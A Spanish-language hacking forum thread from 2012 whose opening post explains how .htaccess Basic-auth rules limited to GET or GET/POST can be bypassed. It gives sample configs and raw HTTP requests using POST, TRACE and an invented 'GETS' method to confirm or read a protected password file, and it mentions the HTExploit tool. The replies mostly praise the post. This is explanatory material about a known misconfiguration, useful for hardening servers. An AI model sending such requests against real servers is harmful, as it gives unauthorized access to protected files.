comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Jugando con .htaccess

  • 6 Respuestas
  • 4059 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« en: Agosto 08, 2012, 02:54:20 am »
La mayoria ya conoce cual es la funcion de este archivo en el servidor encargandose de actuar sobre el fichero de configuracion de apache "httpd.conf"

Permite:

Redireccion de url's

Respuestas de error personalizadas.

Proteccion de directorios, subdirectorios y ficheros en el servidor.

Certificados de autentificacion http.

etc...


No vengo a escribrir de como implementar cada una de sus funciones.

En la Black-Hat pasada se hablo de una supuesta vulnerabilidad en .htaccess, yo creo que mas que una vulnerabilidad es solo una mala implementacion del metodo <Limit> cuando se desea restringir el acceso a cierto directorio/fichero presentando un certificado de autentificacion http.

En cuanto a estos tipos de certificados tenemos los:

Basicos: La contraseña viaja en texto plano

Resumen: El servidor le aplica un hash al password antes de ser enviado.

En la siguiente imagen podemos encontrar un servidor que implementa un certificado de tipo basico.





Conociendo la cantidad de admins que andan sueltos, Podriamos deducir para suerte nuestra que nos estariamos encontrando con un .htaccess configurado de la siguiente manera (supongamos).

Código: [Seleccionar]
AuthUserFile .htpasswd
AuthName "Area Radioactiva"
AuthType Basic

<Limit GET>
require valid-user
</Limit>

Donde esta la mala implementacion?

<Limit GET>

Vemos que solo se limita a peticiones GET, dejando de lado TRACE, OPTIONS, POST, PUT, COPY, MOVE, DELETE, TRACK, etc, entre otras.

Podriamos obtener el contenido de algun fichero detras de la proteccion utilizando el metodo POST.



Otras configuraciones mas restringidas incluyen el metodo POST como limite.

Código: [Seleccionar]
AuthUserFile .htpasswd
AuthName "Area Radioactiva"
AuthType Basic

<Limit GET POST>
require valid-user
</Limit>


Pero eso no nos niega la posibilidad de enumerar los ficheros y directorios protegidos por .htaccess utilizando los demas metodos que se hayen habilitados en el servidor.

Si analizamos, ahun existiendo o no el path /files/pass.txt, el servidor nos responderia con el mismo error 401 (no autorizado)



Lo mismo pasara al realizar una peticion POST, pero que hay de los demas metodos, como responderia ante una peticion http que no este dentro de los <Limit> ? por ejemplo TRACE.

Código: [Seleccionar]
TRACE /files/pass.txt HTTP/1.0

HTTP/1.0 200 ok
Date: Thu, 05 Jul 2012 10:53:32 GTM
Server: Apache /2.2.3 (centOS)
Connection: close
Content-type: message/http
TRACE /files/pass.txt HTTP/1.0

Evidentemente nos responde con 200 ok, hemos logrado evadir la restriccion del .htaccess para deducir la existencia del fichero en el servidor, en caso de no existir el servidor nos responderia con un error 404.

Otro manera seria realizar peticiones con metodos no implementados e inexistentes como GETS, el servidor lo tomaria como si se tratara de un metodo GET.

Código: [Seleccionar]
GETS /files/pass.txt HTTP/1.1

HTTP/1.0 200 ok
Date: Thu, 05 Jul 2012 10:53:32 GTM
Server: Apache /2.2.3 (centOS)
Connection: close
Content-type: message/http

q3rv0:queteimporta

Este tipo de evaciones lo implementa la herramientas HTexploit.



Saludos!





 
« Última modificación: Noviembre 23, 2014, 01:18:33 pm por Expermicid »

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #1 en: Agosto 08, 2012, 11:23:10 am »
Muy buena bro, sigue así!
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Agosto 08, 2012, 12:14:51 pm »
Buen Aporte!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado andrewtwo

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Agosto 30, 2012, 04:20:06 am »
Super bueno el articulo  ;) a ponerlo en practica

Desconectado Mr. Foster

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Octubre 12, 2012, 02:37:06 pm »
Excelenteeee  ;)

Desconectado quen

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Octubre 12, 2012, 11:37:08 pm »
sinceramente me daria verguenza dar una charla en DEFCON sobre este bug que existe hace mucho tiempo.

Cuando fui a la ekoparty, dieron la misma charla, ni la fui a ver, preferi el CTF xD.

Desconectado hum4n3xpl01t

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Octubre 24, 2012, 01:45:18 am »
Interesante material estimado..
Sigan así.

Saludos  8)

 

¿Te gustó el post? COMPARTILO!



[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1644
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
SMF .htaccess ByPass

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2067
Último mensaje Febrero 24, 2010, 03:26:19 pm
por dracko.rx